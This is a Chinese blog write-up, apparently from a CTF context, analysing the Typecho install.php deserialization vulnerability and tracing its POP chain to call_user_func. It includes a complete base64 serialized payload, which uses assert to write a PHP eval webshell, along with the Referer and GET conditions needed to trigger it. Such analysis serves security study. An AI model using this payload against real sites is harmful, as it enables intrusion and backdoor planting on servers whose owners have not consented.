typecho 反序列化漏洞分析

今年西湖论剑线下web1就是typecho,其中自带了这个CVE漏洞。这个反序列化漏洞存在于install.php,POP链构造很巧妙,分析一下。

POP链分析


在230行我们发现它反序列化了Typecho_Cookie::get('__typecho_config'))内容。跟踪发现只要在cookie中存储__typecho_config值就行。

一般的直接反序列化我们能利用的魔法函数有__destruct__wakeup,但全局搜索没有看到什么可以利用的函数。跟踪反序列化后的内容可以发现,$config别作为参数传入类Typecho_Db

跟踪类

$config参数被作为字符串,有字符串的拼接行为。此时如果$config为一个对象,就会调用它的__toString魔法函数,此时我们就多了一个魔法函数调用,全局搜索

有三个,一个一个分析。第一个

只有序列化操作没有什么用。第三个主要是数据库操作也没有什么。
第二个,代码很长,但是内容不多,主要是将类中_items遍历字符串拼接。

其中有一个$item['author']->screenName 此时,如果$item['author'] 是一个对象,且不存在screenName属性时,会自动调用__get魔法函数。此时我们又出现一条路,通过__get魔法函数寻找可调用的危险函数。说干就干,全局搜索__get

内容很多,跟进在Request.php中的__get

继续跟进get函数

在这里可以在类属性_params中存储键值为screenName值为任意的字符串传入_applyFilter函数,跟进

在这里,终于看到危险函数call_user_func,第一个参数为函数名,第二个参数为输入函数的参数。利用也非常简单。

payload生成

根据上面的分析,POP链一步步的跟进我们可以生成以下的利用链

 

生成YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjYwOiJmaWxlX3B1dF9jb250ZW50cygnanJ4bm0ucGhwJywgJzw/cGhwIGV2YWwoJF9HRVRbanJ4bm1dKTsnKTsiO319fX1zOjE5OiIAVHlwZWNob19GZWVkAF90eXBlIjtzOjc6IlJTUyAyLjAiO31zOjY6InByZWZpeCI7czo4OiJfdHlwZWNobyI7fQ==

利用

回到install.php,在上面我们生成了反序列化输入的内容,那么如何触发反序列化呢,分析install.php还应有很简单的两个条件

  1. Referer为本站链接
  2. GET finish必须有值

One thought on “typecho 反序列化漏洞分析

发表评论

电子邮件地址不会被公开。 必填项已用*标注